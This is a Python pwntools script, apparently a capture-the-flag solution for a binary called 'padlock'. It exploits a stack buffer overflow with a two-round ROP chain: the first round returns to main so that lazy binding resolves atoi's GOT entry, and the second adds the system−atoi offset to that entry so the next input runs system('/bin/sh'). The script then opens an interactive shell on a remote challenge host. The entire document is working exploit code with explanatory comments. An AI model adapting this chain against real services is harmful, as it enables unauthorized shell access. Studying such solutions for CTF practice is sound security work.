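from pwn import *

# Bytes of filler between the start of the overflowing buffer and the saved
# return address (the ROP chain starts right after it).
OFF = 80

context.binary = elf = ELF("./padlock", checksec=False)
# Use the libc shipped with the challenge. The whole exploit is a relative
# patch (system - atoi) inside libc, so it only works if this file is the
# exact build the target process has mapped; no libc leak is done.
# (The original script first loaded /usr/lib/libc.so.6 and then immediately
# overwrote it with this one; the dead assignment is dropped.)
libc = ELF("./libc.so.6", checksec=False)

# `python3 solve.py LOCAL` runs against a local process; default is remote.
if args.LOCAL:
    p = process(elf.path)
else:
    p = remote("offsec.m0lecon.it", 13543)

PROMPT = b"[padlock] Decimal combination: "

# Addresses taken from the binary. Using elf.got["atoi"] as a write target
# assumes the GOT is writable (i.e. no Full RELRO); checksec=False above
# hides that warning, so verify it once if the exploit stops working.
add_what = elf.sym["add_what_where"]  # presumably does *rdi += rsi (see chain below)
atoi_got = elf.got["atoi"]            # GOT slot we turn into system()
main = elf.sym["main"]

# Hard-coded gadgets from ./padlock (absolute, so the binary is assumed non-PIE).
pop_rdi = 0x00000000004011FF  # pop rdi ; ret   -> rdi = address of atoi's GOT slot
pop_rsi = 0x0000000000401208  # pop rsi ; ret   -> rsi = system - atoi delta
ret = 0x000000000040101A      # lone ret, keeps rsp 16-byte aligned before calls

print(p.recvuntil(PROMPT))

# Round 1: overflow and simply return to main. Per the original note this is
# done to "populate got table", i.e. make sure atoi's GOT entry already holds
# a resolved libc pointer (lazy binding) before round 2 adds an offset to it.
first_run = flat(
    b"A" * OFF,
    p64(ret),
    p64(main),
)
p.sendline(first_run)
print(p.recvuntil(PROMPT))

# Offset that turns the resolved atoi pointer into system. Masked to 64 bits
# so a negative delta is packed as two's complement rather than rejected by
# p64(). NOTE(review): this assumes add_what_where performs a full 64-bit add;
# confirm by disassembling the gadget before relying on a negative delta.
diff = (libc.symbols["system"] - libc.symbols["atoi"]) & 0xFFFFFFFFFFFFFFFF

# Round 2: GOT patch without a leak.
#   rdi = &GOT[atoi]; rsi = diff; add_what_where -> GOT[atoi] += diff
# then return to main so its next atoi(input) call actually runs system(input).
payload = flat(
    b"A" * OFF,
    p64(ret),
    p64(pop_rdi),
    p64(atoi_got),
    p64(pop_rsi),
    p64(diff),
    p64(add_what),
    p64(ret),
    p64(main),
)
p.sendline(payload)

# The third prompt's input is handed to the patched atoi, i.e. system("/bin/sh").
p.sendline(b"/bin/sh")
p.interactive()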